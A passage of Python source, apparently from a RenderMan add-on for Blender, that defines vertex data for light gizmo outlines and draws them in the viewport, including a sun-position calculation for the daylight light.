(-0.0331659925,-7.85603e-17,0.353804),
(-0.0331659925,-6.53616e-18,0.029436)
]
s_rmanLightLogo['R_outside'] = [
[0.265400, -0.291600, 0.000000],
[0.065400, -0.291600, 0.000000],
[0.065400, -0.125000, 0.000000],
[0.025800, -0.125000, 0.000000],
[0.024100, -0.125000, 0.000000],
[-0.084800, -0.291600, 0.000000],
[-0.305400, -0.291600, 0.000000],
[-0.170600, -0.093300, 0.000000],
[-0.217900, -0.062800, 0.000000],
[-0.254000, -0.023300, 0.000000],
[-0.276900, 0.025800, 0.000000],
[-0.284500, 0.085000, 0.000000],
[-0.284500, 0.086700, 0.000000],
[-0.281200, 0.128700, 0.000000],
[-0.271200, 0.164900, 0.000000],
[-0.254500, 0.196600, 0.000000],
[-0.231000, 0.224900, 0.000000],
[-0.195200, 0.252600, 0.000000],
[-0.149600, 0.273700, 0.000000],
[-0.092000, 0.287100, 0.000000],
[-0.020300, 0.291600, 0.000000],
[0.265400, 0.291600, 0.000000],
[0.265400, -0.291600, 0.000000]
]
s_rmanLightLogo['R_inside'] = [
[0.065400, 0.019100, 0.000000],
[0.065400, 0.133300, 0.000000],
[-0.014600, 0.133300, 0.000000],
[-0.043500, 0.129800, 0.000000],
[-0.065700, 0.119500, 0.000000],
[-0.079800, 0.102100, 0.000000],
[-0.084500, 0.077400, 0.000000],
[-0.084500, 0.075700, 0.000000],
[-0.079800, 0.052000, 0.000000],
[-0.065700, 0.034100, 0.000000],
[-0.043300, 0.022800, 0.000000],
[-0.013800, 0.019100, 0.000000],
[0.065400, 0.019100, 0.000000]
]
s_envday = dict()
s_envday['west_rr_shape'] = [
[-1.9994, 0, -0.1652], [-2.0337, 0, 0.0939],
[-2.0376, 0, 0.1154], [-2.0458, 0, 0.1159],
[-2.046, 0, 0.0952], [-2.0688, 0, -0.2033],
[-2.1958, 0, -0.203], [-2.1458, 0, 0.1705],
[-2.1408, 0, 0.1874], [-2.1281, 0, 0.2],
[-2.1116, 0, 0.2059], [-2.0941, 0, 0.2078],
[-1.9891, 0, 0.2073], [-1.9719, 0, 0.2039],
[-1.9573, 0, 0.1938], [-1.9483, 0, 0.1786],
[-1.9447, 0, 0.1613], [-1.9146, 0, -0.1149],
[-1.9049, 0, -0.1127], [-1.8721, 0, 0.1759],
[-1.8652, 0, 0.1921], [-1.8507, 0, 0.2021],
[-1.8339, 0, 0.2072], [-1.7112, 0, 0.207],
[-1.6943, 0, 0.2024], [-1.6816, 0, 0.1901],
[-1.6744, 0, 0.1742], [-1.6234, 0, -0.2037],
[-1.751, 0, -0.2035], [-1.7748, 0, 0.1153],
[-1.7812, 0, 0.1166], [-1.7861, 0, 0.1043],
[-1.8188, 0, -0.1565], [-1.8218, 0, -0.1738],
[-1.83, 0, -0.1894], [-1.8447, 0, -0.1995],
[-1.8618, 0, -0.2034], [-1.9493, 0, -0.2037],
[-1.967, 0, -0.2024], [-1.9824, 0, -0.1956],
[-1.9943, 0, -0.1825]
]
s_envday['east_rr_shape'] = [
[1.8037, 0, 0.1094], [1.9542, 0, 0.1094],
[1.9604, 0, 0.2004], [1.9175, 0, 0.2043],
[1.8448, 0, 0.2069], [1.7493, 0, 0.2082],
[1.7375, 0, 0.2079], [1.7258, 0, 0.2066],
[1.7144, 0, 0.204], [1.7033, 0, 0.2],
[1.6928, 0, 0.1947], [1.6831, 0, 0.188],
[1.6743, 0, 0.1802], [1.6669, 0, 0.171],
[1.6607, 0, 0.1611], [1.6559, 0, 0.1503],
[1.6527, 0, 0.139], [1.6508, 0, 0.1274],
[1.6502, 0, 0.1156], [1.6502, 0, -0.1122],
[1.6505, 0, -0.1239], [1.6521, 0, -0.1356],
[1.6551, 0, -0.147], [1.6597, 0, -0.1578],
[1.6657, 0, -0.168], [1.6731, 0, -0.1771],
[1.6816, 0, -0.1852], [1.6911, 0, -0.1922],
[1.7014, 0, -0.1978], [1.7124, 0, -0.2021],
[1.7238, 0, -0.205], [1.7354, 0, -0.2066],
[1.7472, 0, -0.207], [1.8528, 0, -0.2058],
[1.9177, 0, -0.2028], [1.9602, 0, -0.1993],
[1.9541, 0, -0.1082], [1.8006, 0, -0.1084],
[1.7892, 0, -0.1054], [1.7809, 0, -0.0968],
[1.7789, 0, -0.0851], [1.7793, 0, -0.0471],
[1.9329, 0, -0.0469], [1.933, 0, 0.0388],
[1.7793, 0, 0.0384], [1.779, 0, 0.0895],
[1.7825, 0, 0.1002], [1.792, 0, 0.1083]
]
s_envday['south_rr_shape'] = [
[0.1585, 0, 1.654], [0.1251, 0, 1.6444],
[0.0918, 0, 1.6383], [0.053, 0, 1.6345],
[0.0091, 0, 1.6331], [-0.0346, 0, 1.6347],
[-0.0712, 0, 1.6397], [-0.1002, 0, 1.6475],
[-0.1221, 0, 1.6587], [-0.142, 0, 1.6791],
[-0.1537, 0, 1.7034], [-0.1579, 0, 1.7244],
[-0.1599, 0, 1.7458], [-0.1593, 0, 1.7672],
[-0.1566, 0, 1.7884], [-0.1499, 0, 1.8088],
[-0.1392, 0, 1.8273], [-0.1249, 0, 1.8433],
[-0.1079, 0, 1.8563], [-0.0894, 0, 1.8675],
[-0.0707, 0, 1.8765], [-0.0139, 0, 1.9013],
[0.0258, 0, 1.9185], [0.041, 0, 1.9287],
[0.0411, 0, 1.939], [0.0366, 0, 1.9485],
[0.0253, 0, 1.9525], [-0.1485, 0, 1.95],
[-0.1566, 0, 2.0398], [-0.1297, 0, 2.0462],
[-0.0876, 0, 2.0538], [-0.0451, 0, 2.0585],
[-0.0024, 0, 2.0603], [0.0403, 0, 2.0591],
[0.0827, 0, 2.0534], [0.1231, 0, 2.0397],
[0.1537, 0, 2.0102], [0.168, 0, 1.97],
[0.1706, 0, 1.9273], [0.1631, 0, 1.8852],
[0.1404, 0, 1.8491], [0.106, 0, 1.8236],
[0.0875, 0, 1.8137], [-0.0136, 0, 1.7711],
[-0.0244, 0, 1.7643], [-0.0309, 0, 1.7558],
[-0.031, 0, 1.7462], [-0.0261, 0, 1.7393],
[-0.0124, 0, 1.7353], [0.1505, 0, 1.7366]
]
s_envday['north_rr_shape'] = [
[-0.144, 0, -2.034], [-0.1584, 0, -2.0323],
[-0.1719, 0, -2.0256], [-0.1804, 0, -2.0136],
[-0.1848, 0, -1.9996], [-0.185, 0, -1.9849],
[-0.185, 0, -1.6235], [-0.0661, 0, -1.6236],
[-0.0663, 0, -1.8158], [-0.0672, 0, -1.8303],
[-0.0702, 0, -1.8594], [-0.0721, 0, -1.8739],
[-0.0654, 0, -1.8569], [-0.048, 0, -1.8169],
[-0.0415, 0, -1.8038], [0.0554, 0, -1.65],
[0.0641, 0, -1.638], [0.0747, 0, -1.6286],
[0.0869, 0, -1.6244], [0.0978, 0, -1.6235],
[0.1541, 0, -1.6238], [0.1677, 0, -1.6263],
[0.1811, 0, -1.6341], [0.1896, 0, -1.6477],
[0.1926, 0, -1.6633], [0.1927, 0, -1.6662],
[0.1927, 0, -2.0339], [0.0743, 0, -2.0341],
[0.0743, 0, -1.8646], [0.0759, 0, -1.8354],
[0.0786, 0, -1.8062], [0.0803, 0, -1.7917],
[0.0735, 0, -1.8051], [0.0605, 0, -1.8312],
[0.0473, 0, -1.8573], [0.0422, 0, -1.8659],
[-0.0534, 0, -2.0154], [-0.0632, 0, -2.0261],
[-0.0741, 0, -2.0322], [-0.0909, 0, -2.034]
]
s_envday['inner_circle_rr_shape'] = [
[0, 0, -1], [-0.1961, 0, -0.9819],
[-0.3822, 0, -0.9202], [-0.5587, 0, -0.8291],
[-0.7071, 0, -0.707], [-0.8308, 0, -0.5588],
[-0.9228, 0, -0.3822], [-0.9811, 0, -0.1961],
[-1.0001, 0, 0], [-0.9811, 0, 0.1961],
[-0.9228, 0, 0.3822], [-0.8361, 0, 0.5486],
[-0.7071, 0, 0.7071], [-0.5587, 0, 0.8311],
[-0.3822, 0, 0.9228], [-0.1961, 0, 0.9811],
[0, 0, 1.0001], [0.1961, 0, 0.981],
[0.3822, 0, 0.9228], [0.5587, 0, 0.8309],
[0.7071, 0, 0.7071], [0.8282, 0, 0.5587],
[0.9228, 0, 0.3822], [0.9811, 0, 0.1961],
[1.0001, 0, 0], [0.9811, 0, -0.1961],
[0.9228, 0, -0.3822], [0.831, 0, -0.5587],
[0.7071, 0, -0.7071], [0.5587, 0, -0.8308],
[0.3822, 0, -0.9228], [0.1961, 0, -0.981]
]
s_envday['outer_circle_rr_shape'] = [
[0, 0, -1], [-0.1961, 0, -0.9815],
[-0.3822, 0, -0.9202], [-0.5587, 0, -0.8288],
[-0.7071, 0, -0.707], [-0.8282, 0, -0.5588],
[-0.9228, 0, -0.3822], [-0.981, 0, -0.1961],
[-1.0001, 0, 0], [-0.981, 0, 0.1961],
[-0.9228, 0, 0.3822], [-0.8308, 0, 0.5538],
[-0.7071, 0, 0.7071], [-0.5587, 0, 0.8302],
[-0.3822, 0, 0.9228], [-0.1961, 0, 0.9811],
[0, 0, 1.0001], [0.1961, 0, 0.981],
[0.3822, 0, 0.9228], [0.5587, 0, 0.8279],
[0.7071, 0, 0.7071], [0.8308, 0, 0.5587],
[0.9228, 0, 0.3822], [0.981, 0, 0.1961],
[1.0001, 0, 0], [0.981, 0, -0.1961],
[0.9228, 0, -0.3822], [0.8308, 0, -0.5587],
[0.7071, 0, -0.7071], [0.5587, 0, -0.8308],
[0.3822, 0, -0.9228], [0.1961, 0, -0.9784]
]
s_envday['compass_shape'] = [
[0, 0, -0.9746], [-0.2163, 0, -0.0012],
[0, 0, 0.9721], [0.2162, 0, -0.0012],
[0, 0, -0.9746]
]
s_envday['east_arrow_shape'] = [
[1.2978, 0, -0.2175], [1.2978, 0, 0.215],
[1.5141, 0, -0.0012], [1.2978, 0, -0.2175]
]
s_envday['south_arrow_shape'] = [
[-0.2163, 0, 1.2965], [0.2162, 0, 1.2965],
[0, 0, 1.5128], [-0.2163, 0, 1.2965]
]
s_envday['west_arrow_shape'] = [
[-1.2979, 0, -0.2175], [-1.2979, 0, 0.215],
[-1.5142, 0, -0.0012], [-1.2979, 0, -0.2175]
]
s_envday['north_arrow_shape'] = [
[-0.2163, 0, -1.2991], [0.2162, 0, -1.2991],
[0, 0, -1.5154], [-0.2163, 0, -1.2991]
]
s_diskLight = [
[0.490300, 0.097500, 0.000000],
[0.461900, 0.191300, 0.000000],
[0.415700, 0.277700, 0.000000],
[0.353500, 0.353500, 0.000000],
[0.277700, 0.415700, 0.000000],
[0.191300, 0.461900, 0.000000],
[0.097500, 0.490300, 0.000000],
[0.000000, 0.499900, 0.000000],
[-0.097500, 0.490300, 0.000000],
[-0.191300, 0.461900, 0.000000],
[-0.277700, 0.415700, 0.000000],
[-0.353500, 0.353500, 0.000000],
[-0.415700, 0.277700, 0.000000],
[-0.461900, 0.191300, 0.000000],
[-0.490300, 0.097500, 0.000000],
[-0.499900, 0.000000, 0.000000],
[-0.490300, -0.097500, 0.000000],
[-0.461900, -0.191300, 0.000000],
[-0.415700, -0.277700, 0.000000],
[-0.353500, -0.353500, 0.000000],
[-0.277700, -0.415700, 0.000000],
[-0.191300, -0.461900, 0.000000],
[-0.097500, -0.490300, 0.000000],
[0.000000, -0.499900, 0.000000],
[0.097500, -0.490300, 0.000000],
[0.191300, -0.461900, 0.000000],
[0.277700, -0.415700, 0.000000],
[0.353500, -0.353500, 0.000000],
[0.415700, -0.277700, 0.000000],
[0.461900, -0.191300, 0.000000],
[0.490300, -0.097500, 0.000000],
[0.500000, 0.000000, 0.000000],
[0.490300, 0.097500, 0.000000]
]
s_distantLight = dict()
s_distantLight['arrow1'] = [
(0.03316599252,-6.536167e-18,0.0294362),
(0.03316599252,-7.856030e-17,0.5),
(0.06810822842,-7.856030e-17,0.5),
(0,-1.11022302e-16, 1.0),
(-0.0681082284,-7.85603e-17,0.5),
(-0.0331659925,-7.85603e-17,0.5),
(-0.0331659925,-6.53616e-18,0.029436)
]
s_distantLight['arrow2'] = [
(0.03316599252,-0.5,0.0294362),
(0.03316599252,-0.5,0.5),
(0.06810822842,-0.5,0.5),
(0,-0.5, 1.0),
(-0.0681082284,-0.5,0.5),
(-0.0331659925,-0.5,0.5),
(-0.0331659925,-0.5,0.029436)
]
s_distantLight['arrow3'] = [
(0.03316599252,0.5,0.0294362),
(0.03316599252,0.5,0.5),
(0.06810822842,0.5,0.5),
(0,0.5, 1.0),
(-0.0681082284,0.5,0.5),
(-0.0331659925,0.5,0.5),
(-0.0331659925,0.5,0.029436)
]
s_portalRays = [
(-1, 0, 0),
(-2, 0, 0),
(-1, 0, 0),
(-1, 0, -1),
(-2, 0, -2),
(-1, 0, -1),
( 0, 0, -1),
( 0, 0, -2),
( 0, 0, -1),
( 1, 0, -1),
( 2, 0, -2),
( 1, 0, -1),
( 1, 0, 0),
( 2, 0, 0),
( 1, 0, 0),
( 1, 0, 1),
( 2, 0, 2),
( 1, 0, 1),
( 0, 0, 1),
( 0, 0, 2),
( 0, 0, 1),
(-1, 0, 1),
(-2, 0, 2),
(-1, 0, 1),
(-1, 0, 0)
]
s_cylinderLight = dict()
s_cylinderLight['vtx'] = [
[-0.5, -0.4045, -0.2938],
[-0.5, -0.1545, -0.4755],
[-0.5, 0.1545, -0.4755],
[-0.5, 0.4045, -0.2938],
[-0.5, 0.5, 0],
[-0.5, 0.4045, 0.2938],
[-0.5, 0.1545, 0.4755],
[-0.5, -0.1545, 0.4755],
[-0.5, -0.4045, 0.2938],
[-0.5, -0.5, 0],
[-0.5, -0.4045, -0.2938],
[0.5, -0.4045, -0.2938],
[0.5, -0.1545, -0.4755],
[0.5, 0.1545, -0.4755],
[0.5, 0.4045, -0.2938],
[0.5, 0.5, 0],
[0.5, 0.4045, 0.2938],
[0.5, 0.1545, 0.4755],
[0.5, -0.1545, 0.4755],
[0.5, -0.4045, 0.2938],
[0.5, -0.5, 0],
[0.5, -0.4045, -0.2938]
]
s_cylinderLight['indices'] = [
(0, 1),
(1, 2),
(2, 3),
(3, 4),
(4, 5),
(5, 6),
(6, 7),
(7, 8),
(8, 9),
(9, 10),
(11, 12),
(12, 13),
(13, 14),
(14, 15),
(15, 16),
(16, 17),
(17, 18),
(18, 19),
(19, 20),
(20, 21),
(0, 11),
(2, 13),
(4, 15),
(6, 17),
(8, 19)
]
_SHADER_ = None
if not bpy.app.background:
_SHADER_ = gpu.shader.from_builtin('3D_UNIFORM_COLOR')
_SELECTED_COLOR_ = (1, 1, 1)
_WIRE_COLOR_ = (0, 0, 0)
if 'Default' in bpy.context.preferences.themes:
_SELECTED_COLOR_ = bpy.context.preferences.themes['Default'].view_3d.object_active
_WIRE_COLOR_ = bpy.context.preferences.themes['Default'].view_3d.wire
def set_selection_color(ob):
global _SELECTED_COLOR_, _WIRE_COLOR_
if ob in bpy.context.selected_objects:
col = (_SELECTED_COLOR_[0], _SELECTED_COLOR_[1], _SELECTED_COLOR_[2], 1)
else:
col = (_WIRE_COLOR_[0], _WIRE_COLOR_[1], _WIRE_COLOR_[2], 1)
_SHADER_.uniform_float("color", col)
def _get_indices(l):
indices = []
for i in range(0, len(l)):
if i == len(l)-1:
indices.append((i, 0))
else:
indices.append((i, i+1))
return indices
def _get_sun_direction(ob):
light = ob.data
rm = light.renderman.get_light_node()
m = Matrix.Identity(4)
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
month = float(rm.month)
day = float(rm.day)
year = float(rm.year)
hour = float(rm.hour)
zone = rm.zone
latitude = rm.latitude
longitude = rm.longitude
sunDirection = Vector([rm.sunDirection[0], rm.sunDirection[1], rm.sunDirection[2]])
if month == 0.0:
return sunDirection
if month == 1.0:
dayNumber = day
elif month == 2.0:
dayNumber = day + 31.0
else:
year_mod = 0.0
if math.fmod(year, 4.0) != 0.0:
year_mod = 0.0
elif math.fmod(year, 100.0) != 0.0:
year_mod = 1.0
elif math.fmod(year, 400.0) != 0.0:
year_mod = 0.0
else:
year_mod = 1.0
dayNumber = math.floor(30.6 * month - 91.4) + day + 59.0 + year_mod
dayAngle = 2.0 * math.pi * float(dayNumber - 81.0 + (hour - zone) / 24.0) / 365.0
timeCorrection = 4.0 * (longitude - 15.0 * zone) + 9.87 * math.sin(2.0 * dayAngle) - 7.53 * math.cos(1.0 * dayAngle) - 1.50 * math.sin(1.0 * dayAngle)
hourAngle = math.radians(15.0) * (hour + timeCorrection / 60.0 - 12.0)
declination = math.asin(math.sin(math.radians(23.45)) * math.sin(dayAngle))
elevation = math.asin(math.sin(declination) * math.sin(math.radians(latitude)) + math.cos(declination) * math.cos(math.radians(latitude)) * math.cos(hourAngle))
azimuth = math.acos((math.sin(declination) * math.cos(math.radians(latitude)) - math.cos(declination) * math.sin(math.radians(latitude)) * math.cos(hourAngle)) / math.cos(elevation))
if hourAngle > 0.0:
azimuth = 2.0 * math.pi - azimuth
sunDirection[0] = math.cos(elevation) * math.sin(azimuth)
sunDirection[1] = max(math.sin(elevation), 0)
sunDirection[2] = math.cos(elevation) * math.cos(azimuth)
return m @ sunDirection
def make_sphere(m):
lats = 12
longs = 20
radius = 0.5
v = []
i = 0
j = 0
for j in range(0, longs+1):
lng = 2 * math.pi * float (j / longs)
x = math.cos(lng)
y = math.sin(lng)
for i in range(0, lats+1):
lat0 = math.pi * (-0.5 + float(i/ lats))
z0 = math.sin(lat0) * radius
zr0 = math.cos(lat0) * radius
v.append( m @ Vector((x*zr0, y*zr0, z0)))
for i in range(0, lats+1):
lat0 = math.pi * (-0.5 + float(i / lats))
z0 = math.sin(lat0) * radius
zr0 = math.cos(lat0) * radius
v.append( m @ Vector((-x*zr0, -y*zr0, z0)))
for i in range(0, lats+1):
lat0 = math.pi * (-0.5 + float(i / lats))
z0 = math.sin(lat0) * radius
zr0 = math.cos(lat0) * radius
for j in range(0, longs+1):
lng = 2 * math.pi * (float(j / longs))
x = math.cos(lng)
y = math.sin(lng)
v.append( m @ Vector((x*zr0, y*zr0, z0)))
return v
def draw_rect_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
box = []
for pt in s_rmanLightLogo['box']:
box.append( m @ Vector(pt))
box_indices = _get_indices(s_rmanLightLogo['box'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box}, indices=box_indices)
batch.draw(_SHADER_)
arrow = []
for pt in s_rmanLightLogo['arrow']:
arrow.append( m @ Vector(pt))
arrow_indices = _get_indices(s_rmanLightLogo['arrow'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow}, indices=arrow_indices)
batch.draw(_SHADER_)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt))
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt))
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
def draw_sphere_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m @ Vector(pt) )
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m2 = m @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m2 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m3 = m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
disk = []
for pt in s_diskLight:
disk.append( m3 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt))
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt))
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
def draw_envday_light(ob):
_SHADER_.bind()
set_selection_color(ob)
loc, rot, sca = Matrix(ob.matrix_world).decompose()
axis,angle = rot.to_axis_angle()
scale = max(sca) # take the max axis
m = Matrix.Translation(loc)
m = m @ Matrix.Rotation(angle, 4, axis)
m = m @ Matrix.Scale(scale, 4)
ob_matrix = m
m = Matrix(ob_matrix)
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
west_rr_shape = []
for pt in s_envday['west_rr_shape']:
west_rr_shape.append( m @ Vector(pt))
west_rr_indices = _get_indices(s_envday['west_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": west_rr_shape}, indices=west_rr_indices)
batch.draw(_SHADER_)
east_rr_shape = []
for pt in s_envday['east_rr_shape']:
east_rr_shape.append( m @ Vector(pt))
east_rr_indices = _get_indices(s_envday['east_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": east_rr_shape}, indices=east_rr_indices)
batch.draw(_SHADER_)
south_rr_shape = []
for pt in s_envday['south_rr_shape']:
south_rr_shape.append( m @ Vector(pt))
south_rr_indices = _get_indices(s_envday['south_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": south_rr_shape}, indices=south_rr_indices)
batch.draw(_SHADER_)
north_rr_shape = []
for pt in s_envday['north_rr_shape']:
north_rr_shape.append( m @ Vector(pt) )
north_rr_indices = _get_indices(s_envday['north_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": north_rr_shape}, indices=north_rr_indices)
batch.draw(_SHADER_)
inner_circle_rr_shape = []
for pt in s_envday['inner_circle_rr_shape']:
inner_circle_rr_shape.append( m @ Vector(pt) )
inner_circle_rr_shape_indices = _get_indices(s_envday['inner_circle_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": inner_circle_rr_shape}, indices=inner_circle_rr_shape_indices)
batch.draw(_SHADER_)
outer_circle_rr_shape = []
for pt in s_envday['outer_circle_rr_shape']:
outer_circle_rr_shape.append( m @ Vector(pt) )
outer_circle_rr_shape_indices = _get_indices(s_envday['outer_circle_rr_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": outer_circle_rr_shape}, indices=outer_circle_rr_shape_indices)
batch.draw(_SHADER_)
compass_shape = []
for pt in s_envday['compass_shape']:
compass_shape.append( m @ Vector(pt))
compass_shape_indices = _get_indices(s_envday['compass_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": compass_shape}, indices=compass_shape_indices)
batch.draw(_SHADER_)
east_arrow_shape = []
for pt in s_envday['east_arrow_shape']:
east_arrow_shape.append( m @ Vector(pt))
east_arrow_shape_indices = _get_indices(s_envday['east_arrow_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": east_arrow_shape}, indices=east_arrow_shape_indices)
batch.draw(_SHADER_)
west_arrow_shape = []
for pt in s_envday['west_arrow_shape']:
west_arrow_shape.append( m @ Vector(pt) )
west_arrow_shape_indices = _get_indices(s_envday['west_arrow_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": west_arrow_shape}, indices=west_arrow_shape_indices)
batch.draw(_SHADER_)
north_arrow_shape = []
for pt in s_envday['north_arrow_shape']:
north_arrow_shape.append( m @ Vector(pt))
north_arrow_shape_indices = _get_indices(s_envday['north_arrow_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": north_arrow_shape}, indices=north_arrow_shape_indices)
batch.draw(_SHADER_)
south_arrow_shape = []
for pt in s_envday['south_arrow_shape']:
south_arrow_shape.append( m @ Vector(pt))
south_arrow_shape_indices = _get_indices(s_envday['south_arrow_shape'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": south_arrow_shape}, indices=south_arrow_shape_indices)
batch.draw(_SHADER_)
sunDirection = _get_sun_direction(ob)
sunDirection = Matrix(ob_matrix) @ Vector(sunDirection)
origin = Matrix(ob_matrix) @ Vector([0,0,0])
sunDirection_pts = [ origin, sunDirection]
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sunDirection_pts}, indices=[(0,1)])
batch.draw(_SHADER_)
# draw a sphere to represent the sun
v = sunDirection - origin
translate = Matrix.Translation(v)
sphere = make_sphere(ob_matrix @ Matrix.Scale(0.25, 4))
sphere_indices = []
for i in range(0, len(sphere)):
if i == len(sphere)-1:
sphere_indices.append((i, 0))
else:
sphere_indices.append((i, i+1))
sphere_shape = []
for pt in sphere:
sphere_shape.append( translate @ Vector(pt) )
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sphere_shape}, indices=sphere_indices)
batch.draw(_SHADER_)
def draw_disk_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
arrow = []
for pt in s_rmanLightLogo['arrow']:
arrow.append( m @ Vector(pt))
arrow_indices = _get_indices(s_rmanLightLogo['arrow'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow}, indices=arrow_indices)
batch.draw(_SHADER_)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt))
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt))
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
def draw_dist_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
arrow1 = []
for pt in s_distantLight['arrow1']:
arrow1.append( m @ Vector(pt) )
arrow1_indices = _get_indices(s_distantLight['arrow1'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow1}, indices=arrow1_indices)
batch.draw(_SHADER_)
arrow2 = []
for pt in s_distantLight['arrow2']:
arrow2.append( m @ Vector(pt))
arrow2_indices = _get_indices(s_distantLight['arrow2'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow2}, indices=arrow2_indices)
batch.draw(_SHADER_)
arrow3 = []
for pt in s_distantLight['arrow3']:
arrow3.append( m @ Vector(pt) )
arrow3_indices = _get_indices(s_distantLight['arrow3'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow3}, indices=arrow3_indices)
batch.draw(_SHADER_)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt) )
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt) )
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
def draw_portal_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt) )
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt))
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
m = ob_matrix @ Matrix.Rotation(math.radians(90.0), 4, 'X')
m = m @ Matrix.Scale(0.5, 4)
rays = []
for pt in s_portalRays:
rays.append( m @ Vector(pt) )
rays_indices = _get_indices(s_portalRays)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": rays}, indices=rays_indices)
batch.draw(_SHADER_)
def draw_dome_light(ob):
_SHADER_.bind()
set_selection_color(ob)
loc, rot, sca = Matrix(ob.matrix_world).decompose()
axis,angle = rot.to_axis_angle()
m = Matrix.Rotation(angle, 4, axis)
m = m @ Matrix.Scale(100, 4)
sphere = make_sphere(m)
sphere_indices = []
for i in range(0, len(sphere)):
if i == len(sphere)-1:
sphere_indices.append((i, 0))
else:
sphere_indices.append((i, i+1))
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sphere}, indices=sphere_indices)
batch.draw(_SHADER_)
def draw_cylinder_light(ob):
_SHADER_.bind()
set_selection_color(ob)
